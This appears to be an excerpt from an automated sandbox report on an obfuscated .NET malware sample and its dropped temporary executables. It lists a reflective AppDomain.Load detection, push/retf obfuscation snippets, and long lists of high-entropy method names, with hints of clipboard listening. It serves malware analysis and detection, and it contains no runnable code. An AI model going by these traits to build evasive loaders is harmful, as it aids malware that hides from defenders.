Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: _2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG System.AppDomain.Load(byte[])
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6 System.AppDomain.Load(byte[])
Source: 0.0.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs .Net Code: _0cq7P1zgeKpKr1Nm3vyeUK7d9RSqotiVfYzpCAzOrWjSysNfbKxfipgCwuJfa17sqoJFCv4kUfnhgpR6
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_00E7E708 push ds; retf 2_2_00E7E7EB
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_00E76A22 pushfd ; retf 2_2_00E76A23
Source: C:\Users\user\AppData\Local\Temp\FB_7BD8.tmp.exe Code function: 2_2_00E70C55 push edi; retf 2_2_00E70C7A
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Code function: 3_2_00007FF848F2A27D push ebx; retn 0009h 3_2_00007FF848F2A3CA
Source: C:\Users\user\AppData\Local\Temp\FB_7D21.tmp.exe Code function: 3_2_00007FF848F200BD pushad ; iretd 3_2_00007FF848F200C1
Source: FB_7D21.tmp.exe.0.dr, lYfWlfT3r7Vqz88tbfAuCjKRe.cs High entropy of concatenated method names: 'kOQ5Z9rwMXQQwsQd9U5wJwGgA', '_5IpOq6mDTAwrp2FTSgHzNUZ6U', 'cPbIlTDjsb7RjMx8Bnmb5BlYC', 'EGhvBkBPenl8anH8LxHEcrnawvcgNbGzlNbtSGDZidi', 'qgCXUhcFghV4Gn09Ux0zMANUpUDIbjpm3b5c3qcS7V8', 'SiVz1GzNIesBAG06rJk9SKNR72BDYDvWSYP7WvEdiQH', '_6Zu4a6W2P7MN3pmUPK9UfKjMO1giZz44TN0pivow5UZ', 'PlbLO24x9CCU8itVg1JImlB5d4peV1YS2Vsh7vULx3N', 'JDQPF1e80PPfAgh8UwKHm2qZ3SrjjTSDyRimnu0c1qC', 'Kv47HDZaPJK92FJq6cVgfoBr0skPYGt056SQmCHp3NL'
Source: FB_7D21.tmp.exe.0.dr, ZQNenIJ11v1eDG5LYuP2OrWwHq14u0rIiwxz57g1fXStOp9D7M6RmGJ4YKEdVQ5EUUTCTZv7PDDfMtzT.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'b6mTyduYMePwCfdIKIVaMUPHF', 'EJWHS3NIZk5yrShQV6UbTF7iG', 'HQWI8F3Evo98iZXl7nPp03wUd', 'uVfhorrceO8DDy2jZSCP4sjid'
Source: FB_7D21.tmp.exe.0.dr, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs High entropy of concatenated method names: 'WOKIIYrThZTCGte1A75mpaGYcGTIovkGFkNhoWEfchfLgJza6BJD6Bwb8ldtUxY27BZGcEQ6Ko22VL0v', '_2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG', 'ct6moaFmxzSEwIBSw5rpr8RVGDQyhSzLEcWeKPn3GlTwBRfSaIJQGP4EqzmGtbrppHVemlokSFDIFISr', 'jUfEW1HLDovEWv1ZZ2zNiS7OUyhKjeBJXG86gTqRm21d1n8vbqzTfp312I43KRCVmeRCgSzDJZYBLYjh', 'gFbqVU5GBTH4rOArujDduUnOvWjfsKUedwGzlcoMMdxUxFKDjxuRbkOJ169CFT9IuRiDSHyxz88kCye0', '_639np3BrkfPYmPr9VF1r5l8eJcR7h6v7PQmNuTkTMjKBkD9o6eKvLwfYP4KVxtbHN8XIPtcwCW848AA5', '_4oih0kLo1v9w1DiU35KzsmEf23mDdPUhb668zPHv7Z9yZOdcwmAGhhBWdUpnyLSHCBVu8Td7QNPAcVDZ', 'EUaHo9pU6vromjIH1zi7gXzYtQGwuar6S7KHNbk1HrSucXpIoSL7I0aHw5NdgXG3IFRHPeNrXOw8so1J', 'QeaFyp7eNMwyVwtHpKxgZRxvsNRfRibyJWARpIr7sDRV2kDKRCjnVVuiToPBdap401IV879hVobpmuqK', 'V41AXdXRfohEGR0ea2I1kBGrbFeFb7frm4Y3YZ1FB2QHwHi368a6UPrH3ZgAmiKBBqkh0cS3TNxAQoXi'
Source: FB_7D21.tmp.exe.0.dr, hMY5B4KaPYBa602NktZ1e4wVF.cs High entropy of concatenated method names: 'WxO6haGbmISoUIXjKWGw5O0f6', '_1KdIk1gCCecm5eb5zn8kSjK12', 'PxlPQIsDfwQvPbKvl2sd3YzC2', 'PQy6sJgSzykRZLc0OQgp3FF40', 'EILjjH71J0z6TCdH4iiqNMin5', 'QyEqwp20c4swV4XJJGsgNpnyq', 'LcILsujkk2zDB1CPWPVFG2jJx', 'uJOKVr0lx53sKgbsneL3CqWRx', 'f9VWvJM0sfsTL6ygejd44nBUT', 'LlvOkQs0TO79zqf2p1q3KccCh'
Source: FB_7D21.tmp.exe.0.dr, jK41xlYzptzDvBwid77hpLBxe.cs High entropy of concatenated method names: 'OKzUlm8N3VhAQNuXvYaHxIv0O', '_2jsV4Dr67P8WIcVYQJEwwfWilcqMU7dWO5FaXzBdwnR', 't33agRLkVoIksIMaeHSr25f5MenSU0vXFDLuVr5rAWm', 'BVIgd1nQM1laXCOCutMUo4uF0HHRkd5UhpQp2AsEeS6', 'Ra43n4P4GpAazsLfytyMIOCicKFs70KMZtEfMom59my'
Source: FB_7D21.tmp.exe.0.dr, bfkfUlXphuDWexMb7Hptw9A0Uiqaqiv3wcTDH2rsesSLHtj7cBMyE3HGKstJUv0HzfSu8adin33UdVLY.cs High entropy of concatenated method names: 'HDzzscQJvBYBgYGtyyJw0Z62S91wb7ZXDt1NMuqGZTnSVN2vcQlDTHXeH2XAhC3gmojn3hCdfamp4xSP', 'DyRfj0jL7Ne2bEzdE2WfU2J4e', '_5cwjx4oJK76DGZBC7HDMSIo6L', 'EkkfnLKHA7eoPdl7FGnKbHjqz', 'XPrOaSGzOF9BMPB0rdF2ZuE16'
Source: FB_7D21.tmp.exe.0.dr, pSKX2ESKYwtRu7HoonhxcJzXgzsbsBZuYOVd9Vds3yt1hGYR8g17cCz98HD7kBGbZuAOSHn3AJPgLdPW.cs High entropy of concatenated method names: 'RegexResult', 'WndProc', 'AlbU71MZss4P6Ud3ulC0jWSFtpHi3ZI21vljNexmkwF', 'vaWpfakNS07K6OJldx85Yn0LszjPpqeyLwg5G7rfYDr'
Source: FB_7D21.tmp.exe.0.dr, lY7fu9PmBNVoe7FoMUHT8miYA4vYaJzHYkvOgkLtM9q5YWq4XECDe3geFnamAon5jKsHVH7R7dVyQ7jT.cs High entropy of concatenated method names: '_5okLwiJ41foiIntIR1bpQIYeVfb2NjbOtPiEyruBdM93JdUDOzPl2DNcdaVHYoqzlbhpqvLy0J9EUv5c', 'zRuxKtrhDWbunSLsf08MNFwph9WUoxAFk7Peo2bBSgilCpod6rdX1Dipbez5CkglY8zOH38ZMrRgwDGy', 'fZjSXjVI15O2JneQcWK85ilLwUINAP6B4FkyPJRSzFE61yuJPAJ19HsvusKKZTzfg7lUQuBArOldit1m', 'H9LK03UymbxxebVhWZLTVv3J88tyfIEKzzm9OStrPybmLFzdpu1V3lVipOh8awPV4gwN4DXIusrByqJs', 'staanouH9VVllYfUirHPC8zURapjFNgkbkbX2so6bIvb3wjagEhKC8k4nreHsHMrkbfHI1zpEdwNYZDe', 'pksVU8d9sjP2rIBvVbq1TZVmILG3XBWNflKO6HKmIgXkSbX6NZ5DgPC3M0cZ9EsA0GNH75zt5OAnngZT', 'GxfNTiSDCrb2TBkwI3tRzIuCv', 'iqbQLy0cKqXw68POWUFeBa0d0', 'aQEYPV88MgVpz2hMiTlWb6OeS', 'TcHYqV6bJRKM2fPlJrCwUZzmw'
Source: FB_7D21.tmp.exe.0.dr, eaJ1eKHKproU4hPKL7zZaCt5LB6GnC019powyiFeyxf1p497Wp7fUp93E51MTTI9BUzY4mbqnkBEPVkB.cs High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'rjdrfrwAPPrH1gmYvWMyWqSDfwqLZrtzMOvlKFth4qIJyiOf0wirwL5Om8LDhRnfIXZdMIop9WZXlb93', 'xXTE3lS6QGxTBbQ6kgQwrnpXxPaNKn9C9N6INDuT2MlzvDfgO4DXX3oQtM', 'CoeaOGHXL0uzLmA25lE8RaXN5bTKg89qRqnXEiCDnBpP14hEsB1GcFe021', 'zlIqWsIOWHNCPt6mOc8ndEvujhC768c6GbdgaLArA3C', 'efdMufKoG8bO1IUbkgO4A2TnkTN9z1dusJF9Pcw3daY'
Source: FB_7D21.tmp.exe.0.dr, AJvfNnDNTuJbwuIBkqtWLE92s69ypiSn3oEaccD5GcHIniAl3b0xmXCXXRQlDua39ELK6FfoXcbxDFtY.cs High entropy of concatenated method names: 'Zc0UAmirWNgMyU7RPbJclq0193JoKzdFjsT4ZUKLtBhG1SBtPc6mSKSfvhSv0MF6g3KbymOiN34vXBn2', 'xTtuDFtpunXLooIWmqJev5GyqjMpjlO5Pn7UNZnkHrIGoYIGVa7IoMZCEfCFnDuXsUC2rwixA1bjDEUw', 'qOAWJaM4h2YSCf2MDhBIMnRhdMBJLpG0SKzQTS3P80vgUs7g3cS7PK9ThtidaIT1R0d1c5geZf4JXViM', '_2GsH2tkogI2SHuEIgb66fa097', '_6NGmkasVpmvh070n767Zd89nMCnZKzTKwRTM5nXWcHH', 'HRTNPv742zdrFAMGwyGGxu87xflCuNVlRzsJRf3UiCU', 'V79dguIYFqPHIKmsX53d2RFCHn4VhwACswLW99D4JC7', 'IZMLsuKXM0BIC3Kj75qehAvrxsOQwkZ30Igw0JxA80b', '_8bWGcTHdIsr9qNXOZP7YFjCbS0Kns99IFIzGWB3tHiN', 'R3atKa2W4XuqIcUUDI38NAdMcGQGZVbBvDxDMlnf6KB'
Source: FB_7D21.tmp.exe.0.dr, jGx5RVtWYDbZ1ToL6PNlOwWojB7jLJ6X5CBAFyGmvjvmlmioDwDZ5YjCVlsreufEP7Xse0xBH6GOHG8W.cs High entropy of concatenated method names: 'PtV3PgKoBJTBfHxOerUNidcwttFhlmwA8WDrWJTvwC2tOWY6l2hr9WVMOE316RohdBnAt9DUJhilYxz3', '_8BcFZG9nKm0Y5eKfyHrDW01Wvwc7CixNNvv1qM9DSM7Xw9wX7hUMTZk9L2NrMS48M02xNbGRVqjpgeq0', 'r2jWTD7FccKEuteed9WoBhB1Vn4JqKKksl3P579LWfpSQW3lTEyzyN91wfwmfHktqShUVwDDavsU1w5r', '_1exytb0IPi12lfcbJAUh2727dO4kKzebEdYC9Pfp0kLBrUrqJOh9CBvY5JR50upgpoe4v1NAZTP9fLwf', 'dZsr8qHlvW1VCFIgnTvIMwWbWMJnC1TmJfHt6k8S2m3inKm9yojdFlmddNEqv0ZiX9eQe4LHUZHN04FI', 'jpDYV1bSvTmVc8YKjIjO2igHlU5iQbA37qnhQlaqhX8i9PzhNLXiZAv3xwb49LcIFxEGJ1FdueFBS7P3', '_2OgwX7POlj3Lc7k0HVLc96Jm1H13YqCu3MmxPt8PTCnT7UO158KKKLsh39l3t9KhGVtNJN8WXk0fPI73', 'pZFSqEaHAjFQiDGNuydShEAx9dEA9Z4XEyA9cjqfApsDWcTUx4G11fj6Fnd4Qa5F3r9uiYWbxvzA5Uoi', 'wPprlMMgS8b7KRfzzaYNtXG224hdQjXdQA2bY9s37h5XyJI0wqfyVDN55SZpOCxoo94AweNHBnHgQ8Tu', '_3DEtVD6Qj8FBLGIMfr4L1gJLG5Wh10yDVfhAwiXkVFEtyC8yiF81mnqH85ItdVEe6Xios4sz19oD7SY6'
Source: FB_7D21.tmp.exe.0.dr, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs High entropy of concatenated method names: 'PNucxFnsZsmAH7ZtXAiLbYhTNwtoXdI3jSrG7l8JdFYI8y4ECae9QkpQxfCHI9CjoO37RtMbdN9QCRXA', 'jLiZEHlb8BeExAypewg0zeOoIRJBC4B4awLpTrKIInWmOfnIoqLljjFzAd1r2ByGWGH98bloN9ZRBPtd', 'tLRtcoizkEN95DWlJbuywj8qmTExZ2cF4QDYZKjqtBmUUedW8T9LcTtJFgNgl26hmcD6HXf3sdOMy3G7', 'pUQwgSO8RxKDRVwxnrsUWWj0QvQfWjrWlfB32szLybBrnHNL6P42mf3fEeFhXZQaTya4hKG6HBVYia6X', 'saI1iCbtHUFoBOe0YDbOsFuazEiP9peNaRt8lfw92OqJCrtCr0ntP3cXoqTKn0apPe2I7AbDQPdKNIRC', '_2LsIhZlfyiomhnjRA5BvAhexUvDfebqf3EIoHS0ytB9QGrcn0ugT72LAgdp9Grpxo0H4F7YyXQhOFPOy', '_5AWy2heCIieySYSYqguGUmV6MLXLVTLloftBenWstbEZdWXKjxN3X0bgVyF0wh25yHIvtuM1JbN9IsYP', 'WUvexTw2mL3On7KYwkAaLpgLg4QvlFX5Lg4Hs3pvpuyJAX12BxwE6WI7y2EbRbEwB6Ra5UdwXI7e0OgU', 'Ii9U3wE8YOPWYQykTTsUNk92la58iAVmecCGoooKy9uv8H2onRYJ7hpsTsnh61XZcHrteUk8Xbtobs67', 'kc0jgJebYNKe5XBYQAIof8kMjBCh79rlVPyB41WIALEb1JkDpf7SWQ7eAsYqDHx4WBu3vttZF2VEqDFC'
Source: FB_7D21.tmp.exe.0.dr, qmTkyAvhb2wNt6EFJkgKoQx8PUNM9p5XrEj4MhYLRljIFetnOWMNbr3hROe7cILDy1AzKJEMlJzfISXn.cs High entropy of concatenated method names: 'T8N6JYRItBvITsl2B5FCZRlmiaVshMFO1A1pS8qCoXVzg8WrRMPQrOZ2MjWPZDNL96s4ZDXD0859xnzb', 'Hp4ifZNL0Zk6d3JpS3mb9ecb3cvLWnhrESlgjj4yKKVf2HuHhLzO70Ux8rvFtMehJKX6BsXWtMZA8md6', '_5I6uyywkP7w8NWl9CieCynsQVnYWuakDbIwAzhA75v0', 'CZK5mO0F213iwf5NMqGRXS9Fh8854sXfzLFunHGtctS', 'BsZyf5sKGTGC1Lb0aJbVV7wYV9Ce92dym7bdyixwf6K', 'Wo93OYkcN7j0LD2jtZuBD4VOYyPxDuYYemH99eds4Ph'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, lYfWlfT3r7Vqz88tbfAuCjKRe.cs High entropy of concatenated method names: 'kOQ5Z9rwMXQQwsQd9U5wJwGgA', '_5IpOq6mDTAwrp2FTSgHzNUZ6U', 'cPbIlTDjsb7RjMx8Bnmb5BlYC', 'EGhvBkBPenl8anH8LxHEcrnawvcgNbGzlNbtSGDZidi', 'qgCXUhcFghV4Gn09Ux0zMANUpUDIbjpm3b5c3qcS7V8', 'SiVz1GzNIesBAG06rJk9SKNR72BDYDvWSYP7WvEdiQH', '_6Zu4a6W2P7MN3pmUPK9UfKjMO1giZz44TN0pivow5UZ', 'PlbLO24x9CCU8itVg1JImlB5d4peV1YS2Vsh7vULx3N', 'JDQPF1e80PPfAgh8UwKHm2qZ3SrjjTSDyRimnu0c1qC', 'Kv47HDZaPJK92FJq6cVgfoBr0skPYGt056SQmCHp3NL'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, ZQNenIJ11v1eDG5LYuP2OrWwHq14u0rIiwxz57g1fXStOp9D7M6RmGJ4YKEdVQ5EUUTCTZv7PDDfMtzT.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'b6mTyduYMePwCfdIKIVaMUPHF', 'EJWHS3NIZk5yrShQV6UbTF7iG', 'HQWI8F3Evo98iZXl7nPp03wUd', 'uVfhorrceO8DDy2jZSCP4sjid'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eweUvwBKxmhZfBfSVlk38MNjBXZLrJOeoxQCvhBnvpGnchz4YruugnFhA4jj7qpF83mSwyAvrTc7UdbQ.cs High entropy of concatenated method names: 'WOKIIYrThZTCGte1A75mpaGYcGTIovkGFkNhoWEfchfLgJza6BJD6Bwb8ldtUxY27BZGcEQ6Ko22VL0v', '_2p6j7rWUglfKjEQmV1usPbb2Iq3Km88KbCQhArOcO2DdVu3z1iXlaobQIGnfcG78E98Ic4dpWbXMKVzG', 'ct6moaFmxzSEwIBSw5rpr8RVGDQyhSzLEcWeKPn3GlTwBRfSaIJQGP4EqzmGtbrppHVemlokSFDIFISr', 'jUfEW1HLDovEWv1ZZ2zNiS7OUyhKjeBJXG86gTqRm21d1n8vbqzTfp312I43KRCVmeRCgSzDJZYBLYjh', 'gFbqVU5GBTH4rOArujDduUnOvWjfsKUedwGzlcoMMdxUxFKDjxuRbkOJ169CFT9IuRiDSHyxz88kCye0', '_639np3BrkfPYmPr9VF1r5l8eJcR7h6v7PQmNuTkTMjKBkD9o6eKvLwfYP4KVxtbHN8XIPtcwCW848AA5', '_4oih0kLo1v9w1DiU35KzsmEf23mDdPUhb668zPHv7Z9yZOdcwmAGhhBWdUpnyLSHCBVu8Td7QNPAcVDZ', 'EUaHo9pU6vromjIH1zi7gXzYtQGwuar6S7KHNbk1HrSucXpIoSL7I0aHw5NdgXG3IFRHPeNrXOw8so1J', 'QeaFyp7eNMwyVwtHpKxgZRxvsNRfRibyJWARpIr7sDRV2kDKRCjnVVuiToPBdap401IV879hVobpmuqK', 'V41AXdXRfohEGR0ea2I1kBGrbFeFb7frm4Y3YZ1FB2QHwHi368a6UPrH3ZgAmiKBBqkh0cS3TNxAQoXi'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, hMY5B4KaPYBa602NktZ1e4wVF.cs High entropy of concatenated method names: 'WxO6haGbmISoUIXjKWGw5O0f6', '_1KdIk1gCCecm5eb5zn8kSjK12', 'PxlPQIsDfwQvPbKvl2sd3YzC2', 'PQy6sJgSzykRZLc0OQgp3FF40', 'EILjjH71J0z6TCdH4iiqNMin5', 'QyEqwp20c4swV4XJJGsgNpnyq', 'LcILsujkk2zDB1CPWPVFG2jJx', 'uJOKVr0lx53sKgbsneL3CqWRx', 'f9VWvJM0sfsTL6ygejd44nBUT', 'LlvOkQs0TO79zqf2p1q3KccCh'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, jK41xlYzptzDvBwid77hpLBxe.cs High entropy of concatenated method names: 'OKzUlm8N3VhAQNuXvYaHxIv0O', '_2jsV4Dr67P8WIcVYQJEwwfWilcqMU7dWO5FaXzBdwnR', 't33agRLkVoIksIMaeHSr25f5MenSU0vXFDLuVr5rAWm', 'BVIgd1nQM1laXCOCutMUo4uF0HHRkd5UhpQp2AsEeS6', 'Ra43n4P4GpAazsLfytyMIOCicKFs70KMZtEfMom59my'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, bfkfUlXphuDWexMb7Hptw9A0Uiqaqiv3wcTDH2rsesSLHtj7cBMyE3HGKstJUv0HzfSu8adin33UdVLY.cs High entropy of concatenated method names: 'HDzzscQJvBYBgYGtyyJw0Z62S91wb7ZXDt1NMuqGZTnSVN2vcQlDTHXeH2XAhC3gmojn3hCdfamp4xSP', 'DyRfj0jL7Ne2bEzdE2WfU2J4e', '_5cwjx4oJK76DGZBC7HDMSIo6L', 'EkkfnLKHA7eoPdl7FGnKbHjqz', 'XPrOaSGzOF9BMPB0rdF2ZuE16'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, pSKX2ESKYwtRu7HoonhxcJzXgzsbsBZuYOVd9Vds3yt1hGYR8g17cCz98HD7kBGbZuAOSHn3AJPgLdPW.cs High entropy of concatenated method names: 'RegexResult', 'WndProc', 'AlbU71MZss4P6Ud3ulC0jWSFtpHi3ZI21vljNexmkwF', 'vaWpfakNS07K6OJldx85Yn0LszjPpqeyLwg5G7rfYDr'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, lY7fu9PmBNVoe7FoMUHT8miYA4vYaJzHYkvOgkLtM9q5YWq4XECDe3geFnamAon5jKsHVH7R7dVyQ7jT.cs High entropy of concatenated method names: '_5okLwiJ41foiIntIR1bpQIYeVfb2NjbOtPiEyruBdM93JdUDOzPl2DNcdaVHYoqzlbhpqvLy0J9EUv5c', 'zRuxKtrhDWbunSLsf08MNFwph9WUoxAFk7Peo2bBSgilCpod6rdX1Dipbez5CkglY8zOH38ZMrRgwDGy', 'fZjSXjVI15O2JneQcWK85ilLwUINAP6B4FkyPJRSzFE61yuJPAJ19HsvusKKZTzfg7lUQuBArOldit1m', 'H9LK03UymbxxebVhWZLTVv3J88tyfIEKzzm9OStrPybmLFzdpu1V3lVipOh8awPV4gwN4DXIusrByqJs', 'staanouH9VVllYfUirHPC8zURapjFNgkbkbX2so6bIvb3wjagEhKC8k4nreHsHMrkbfHI1zpEdwNYZDe', 'pksVU8d9sjP2rIBvVbq1TZVmILG3XBWNflKO6HKmIgXkSbX6NZ5DgPC3M0cZ9EsA0GNH75zt5OAnngZT', 'GxfNTiSDCrb2TBkwI3tRzIuCv', 'iqbQLy0cKqXw68POWUFeBa0d0', 'aQEYPV88MgVpz2hMiTlWb6OeS', 'TcHYqV6bJRKM2fPlJrCwUZzmw'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, eaJ1eKHKproU4hPKL7zZaCt5LB6GnC019powyiFeyxf1p497Wp7fUp93E51MTTI9BUzY4mbqnkBEPVkB.cs High entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'rjdrfrwAPPrH1gmYvWMyWqSDfwqLZrtzMOvlKFth4qIJyiOf0wirwL5Om8LDhRnfIXZdMIop9WZXlb93', 'xXTE3lS6QGxTBbQ6kgQwrnpXxPaNKn9C9N6INDuT2MlzvDfgO4DXX3oQtM', 'CoeaOGHXL0uzLmA25lE8RaXN5bTKg89qRqnXEiCDnBpP14hEsB1GcFe021', 'zlIqWsIOWHNCPt6mOc8ndEvujhC768c6GbdgaLArA3C', 'efdMufKoG8bO1IUbkgO4A2TnkTN9z1dusJF9Pcw3daY'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, AJvfNnDNTuJbwuIBkqtWLE92s69ypiSn3oEaccD5GcHIniAl3b0xmXCXXRQlDua39ELK6FfoXcbxDFtY.cs High entropy of concatenated method names: 'Zc0UAmirWNgMyU7RPbJclq0193JoKzdFjsT4ZUKLtBhG1SBtPc6mSKSfvhSv0MF6g3KbymOiN34vXBn2', 'xTtuDFtpunXLooIWmqJev5GyqjMpjlO5Pn7UNZnkHrIGoYIGVa7IoMZCEfCFnDuXsUC2rwixA1bjDEUw', 'qOAWJaM4h2YSCf2MDhBIMnRhdMBJLpG0SKzQTS3P80vgUs7g3cS7PK9ThtidaIT1R0d1c5geZf4JXViM', '_2GsH2tkogI2SHuEIgb66fa097', '_6NGmkasVpmvh070n767Zd89nMCnZKzTKwRTM5nXWcHH', 'HRTNPv742zdrFAMGwyGGxu87xflCuNVlRzsJRf3UiCU', 'V79dguIYFqPHIKmsX53d2RFCHn4VhwACswLW99D4JC7', 'IZMLsuKXM0BIC3Kj75qehAvrxsOQwkZ30Igw0JxA80b', '_8bWGcTHdIsr9qNXOZP7YFjCbS0Kns99IFIzGWB3tHiN', 'R3atKa2W4XuqIcUUDI38NAdMcGQGZVbBvDxDMlnf6KB'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, jGx5RVtWYDbZ1ToL6PNlOwWojB7jLJ6X5CBAFyGmvjvmlmioDwDZ5YjCVlsreufEP7Xse0xBH6GOHG8W.cs High entropy of concatenated method names: 'PtV3PgKoBJTBfHxOerUNidcwttFhlmwA8WDrWJTvwC2tOWY6l2hr9WVMOE316RohdBnAt9DUJhilYxz3', '_8BcFZG9nKm0Y5eKfyHrDW01Wvwc7CixNNvv1qM9DSM7Xw9wX7hUMTZk9L2NrMS48M02xNbGRVqjpgeq0', 'r2jWTD7FccKEuteed9WoBhB1Vn4JqKKksl3P579LWfpSQW3lTEyzyN91wfwmfHktqShUVwDDavsU1w5r', '_1exytb0IPi12lfcbJAUh2727dO4kKzebEdYC9Pfp0kLBrUrqJOh9CBvY5JR50upgpoe4v1NAZTP9fLwf', 'dZsr8qHlvW1VCFIgnTvIMwWbWMJnC1TmJfHt6k8S2m3inKm9yojdFlmddNEqv0ZiX9eQe4LHUZHN04FI', 'jpDYV1bSvTmVc8YKjIjO2igHlU5iQbA37qnhQlaqhX8i9PzhNLXiZAv3xwb49LcIFxEGJ1FdueFBS7P3', '_2OgwX7POlj3Lc7k0HVLc96Jm1H13YqCu3MmxPt8PTCnT7UO158KKKLsh39l3t9KhGVtNJN8WXk0fPI73', 'pZFSqEaHAjFQiDGNuydShEAx9dEA9Z4XEyA9cjqfApsDWcTUx4G11fj6Fnd4Qa5F3r9uiYWbxvzA5Uoi', 'wPprlMMgS8b7KRfzzaYNtXG224hdQjXdQA2bY9s37h5XyJI0wqfyVDN55SZpOCxoo94AweNHBnHgQ8Tu', '_3DEtVD6Qj8FBLGIMfr4L1gJLG5Wh10yDVfhAwiXkVFEtyC8yiF81mnqH85ItdVEe6Xios4sz19oD7SY6'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.cs High entropy of concatenated method names: 'PNucxFnsZsmAH7ZtXAiLbYhTNwtoXdI3jSrG7l8JdFYI8y4ECae9QkpQxfCHI9CjoO37RtMbdN9QCRXA', 'jLiZEHlb8BeExAypewg0zeOoIRJBC4B4awLpTrKIInWmOfnIoqLljjFzAd1r2ByGWGH98bloN9ZRBPtd', 'tLRtcoizkEN95DWlJbuywj8qmTExZ2cF4QDYZKjqtBmUUedW8T9LcTtJFgNgl26hmcD6HXf3sdOMy3G7', 'pUQwgSO8RxKDRVwxnrsUWWj0QvQfWjrWlfB32szLybBrnHNL6P42mf3fEeFhXZQaTya4hKG6HBVYia6X', 'saI1iCbtHUFoBOe0YDbOsFuazEiP9peNaRt8lfw92OqJCrtCr0ntP3cXoqTKn0apPe2I7AbDQPdKNIRC', '_2LsIhZlfyiomhnjRA5BvAhexUvDfebqf3EIoHS0ytB9QGrcn0ugT72LAgdp9Grpxo0H4F7YyXQhOFPOy', '_5AWy2heCIieySYSYqguGUmV6MLXLVTLloftBenWstbEZdWXKjxN3X0bgVyF0wh25yHIvtuM1JbN9IsYP', 'WUvexTw2mL3On7KYwkAaLpgLg4QvlFX5Lg4Hs3pvpuyJAX12BxwE6WI7y2EbRbEwB6Ra5UdwXI7e0OgU', 'Ii9U3wE8YOPWYQykTTsUNk92la58iAVmecCGoooKy9uv8H2onRYJ7hpsTsnh61XZcHrteUk8Xbtobs67', 'kc0jgJebYNKe5XBYQAIof8kMjBCh79rlVPyB41WIALEb1JkDpf7SWQ7eAsYqDHx4WBu3vttZF2VEqDFC'
Source: 0.2.DJ5PhUwOsM.exe.43ead8.2.raw.unpack, qmTkyAvhb2wNt6EFJkgKoQx8PUNM9p5XrEj4MhYLRljIFetnOWMNbr3hROe7cILDy1AzKJEMlJzfISXn.cs High entropy of concatenated method names: 'T8N6JYRItBvITsl2B5FCZRlmiaVshMFO1A1pS8qCoXVzg8WrRMPQrOZ2MjWPZDNL96s4ZDXD0859xnzb', 'Hp4ifZNL0Zk6d3JpS3mb9ecb3cvLWnhrESlgjj4yKKVf2HuHhLzO70Ux8rvFtMehJKX6BsXWtMZA8md6', '_5I6uyywkP7w8NWl9CieCynsQVnYWuakDbIwAzhA75v0', 'CZK5mO0F213iwf5NMqGRXS9Fh8854sXfzLFunHGtctS', 'BsZyf5sKGTGC1Lb0aJbVV7wYV9Ce92dym7bdyixwf6K', 'Wo93OYkcN7j0LD2jtZuBD4VOYyPxDuYYemH99eds4Ph'
